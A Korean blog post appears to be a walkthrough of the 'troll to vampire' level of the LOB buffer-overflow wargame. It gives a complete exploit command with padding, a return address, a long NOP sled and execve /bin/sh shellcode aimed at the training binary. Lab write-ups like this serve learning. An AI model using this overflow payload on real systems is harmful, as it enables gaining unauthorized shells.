Notice
Recent Posts
Recent Comments
Link
일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | |||||
3 | 4 | 5 | 6 | 7 | 8 | 9 |
10 | 11 | 12 | 13 | 14 | 15 | 16 |
17 | 18 | 19 | 20 | 21 | 22 | 23 |
24 | 25 | 26 | 27 | 28 | 29 | 30 |
31 |
Tags
- 마크업 언어
- argv
- kosis
- IS함수
- anxi0
- lob
- 데이터형
- pythoncli
- argc
- kostat
- 써니나타스 1번
- lob 9번
- lob 7번
- troll to
- pyinstaller
- 범용레지스터 #레지스터 #어셈블리 #ASM #리버싱 #어셈블리어 #EAX #ESP
- lob 10번
- mode함수
- 결측치
- 빅데이터
- 서니나타스
- wolfman to darkelf
- R언어
- pythonexe
- 포너블
- 써니나타스
- ultra argv hunter
- 쉘코드
- 자료개방포털
- orge to troll
Archives
- Today
- Total
ANX1-Z3R0의 불안극복(不安克服)
010. troll to vampire | anxi0 본문
troll to vampire,
바로 가보자.
ret 주소를 제한하네?
./(실행파일명) `python -c 'print "A"*44 + "BBBB"~~~~'` 에서
"BBBB" 부분이다.
저 자리가 \xff가 아니면 된다.
쉽군
nop sled를 더 길게 해준다. 그다음 ret 주소가 0xbfff....를 넘게 해준다.
<- ./vampire `python -c 'print "A"*44 + "\x20\x9d\xfe\xbf" + "\x90"*100000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
하면
쓱-싹
교훈
1. 하다보면 이해 잘 안되고, 너무 내용길어서 힘들 수 있지만, 차근차근 반복해서 보면 언젠가는 된다.
2. 몇 번 포기해도, 나처럼 갑자기 삘받는 시기가 온다.
3. 현타가 온다면 정상이다.
'HACKING > [SYSTEM HACKING] LOB' 카테고리의 다른 글
012. skeleton to golem | anxi0 (0) | 2019.04.03 |
---|---|
011. vampire to skeleton | anxi0 (0) | 2019.03.21 |
009. orge to troll | anxi0 (0) | 2019.02.19 |
008. darkelf to orge | anxi0 (0) | 2019.02.18 |
007. wolfman to darkelf | anxi0 (0) | 2019.02.17 |
Comments